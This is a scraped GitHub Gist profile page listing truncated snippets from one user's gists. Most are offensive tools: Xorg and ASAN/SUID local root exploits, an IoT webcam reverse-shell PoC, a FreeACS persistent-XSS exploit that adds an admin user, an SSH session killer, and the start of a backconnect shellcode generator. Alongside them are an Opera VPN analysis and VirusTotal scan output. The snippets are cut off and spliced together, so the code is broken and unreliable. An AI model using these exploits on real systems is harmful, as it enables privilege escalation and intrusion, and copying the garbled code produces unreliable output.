Skip to content

Instantly share code, notes, and snippets.

View 0x27's full-sized avatar

David Davidson 0x27

View GitHub Profile
#!/usr/bin/env bash
# Displays a timeless message in your terminal with cosmic color effects
# Usage: add "sh ~/; sleep 2" to .bash_logout (or similar) in your home directory
# (adjust the sleep variable to display the message for more seconds)
# Cosmic color sequence
echo "SSH hangup user tool. For killing other users connections."
if [ $# -eq 0 ]
echo "use: $0 <PTS number to kill>"
echo "Terminating PTS/$1"
OWNER=$(stat -c '%U' /dev/pts/$i)
SSH_PID=$(pgrep -a sshd | grep pts/$1 | cut -d ' ' -f 1)
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
# coding: utf-8
# implements:
# we import some random
import random
# first, we create our arrays, and pick random words from them and store.
a = random.choice(["cat", "horse", "seagull", "dolphin", "fire engine"])
b = random.choice(["escape", "make love to", "smother", "dance with"])
c = random.choice(["drumkit", "firework", "toilet", "seagull", "bag"])
d = random.choice(["disco", "airport", "changing room", "tumble dryer"])
0x27 / upwned247.php
Created May 5, 2017 11:44 — forked from Wack0/upwned247.php
UCam247/Phylink/Titathink/YCam/Anbash/Trivision/Netvision/others IoT webcams : remote code exec: reverse shell PoC. (works only in qemu usermode)
Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU
usermode emulation (seems I pushed an old version), and removed debug output.
If anyone wants to fix this, go ahead (no pun intended).
However, I don't have a vulnerable product and am unwilling to acquire one.
0x27 /
Created April 7, 2017 14:08
FreeACS Remote Takeover 0day (Persistent XSS via CWMP NOTIFY -> Add Admin User
# worlds cheapest exploit - made by copypasting from stackoverflow.
# released at BSides Edinburgh.
# Exploits freeacs -
# TL;DR:
# - Persistent XSS via CWMP Notify message
# - XSS fires in admin session and adds a user
# Darren Martyn - @info_dox - 7th March 2017
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
0x27 /
Created January 19, 2017 15:49 — forked from spaze/
Opera VPN behind the curtains is just a proxy, here's how it works

When setting up (that's immediately when user enables it in settings) Opera VPN sends few API requests to to obtain credentials and proxy IPs, see below, also see The Oprah Proxy.

The browser then talks to a proxy (when VPN location is set to Germany), it's IP address can only be resolved from within Opera when VPN is on, it's (or similar, see below). It's an HTTP/S proxy which requires auth.

When loading a page with Opera VPN enabled, the browser sends a lot of requests to with Proxy-Authorization request header.

The Proxy-Authorization header decoded: CC68FE24C34B5B2414FB1DC116342EADA7D5C46B:9B9BE3FAE674A33D1820315F4CC94372926C8210B6AEC0B662EC7CAD611D86A3 (that's sha1(device_id):device_password, where device_id and device_password come from the POST /v2/register_device API call, please note that this decoded header is from another Opera installation and thus contains

Preview of vtscantar (which is going to be re-integrated into hfsdown). Only alerts on the files in the tar that are flagged by VirusTotal.

hack@theplanet:~/vtscantar$ python ~/hfsdown/output/mirror- 
Scanning: /home/hack/hfsdown/output/mirror-
Infected File: DANDNA.apk -> SHA256sum: 72a0745d835d15a707580e3df36396fb2598d61314bb740772a36150d682ea12 -> VirusTotal: 22/55
Infected File: svchost.exe -> SHA256sum: 640525b3d664fe8ae8c861276c15dfec60f6f19db26669dcf28b13620cfced9d -> VirusTotal: 38/53
Infected File: ���22_sign.apk -> SHA256sum: 23f6e9b5e5ba85621d8b7403390825aa767ff6da28132e025844fba1e1ef47f2 -> VirusTotal: 21/54
Infected File: ���˽�_sign.apk -> SHA256sum: 37b02bbfec667862b4f6adcc0429d46e93e7a159244d6ffbf2af27d035d903f5 -> VirusTotal: 22/54
# - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here:
# Video of Exploitation:
# coding: utf-8
# sctp backconnect elf generator v1.0
import socket
import struct
import sys
def make_shellcode(cb_host, cb_port):
sc = "7f454c4602010100000000000000000002003e00010000007800400000000000"
sc += "400000000000000000000000000000000000000040003800010000000000000"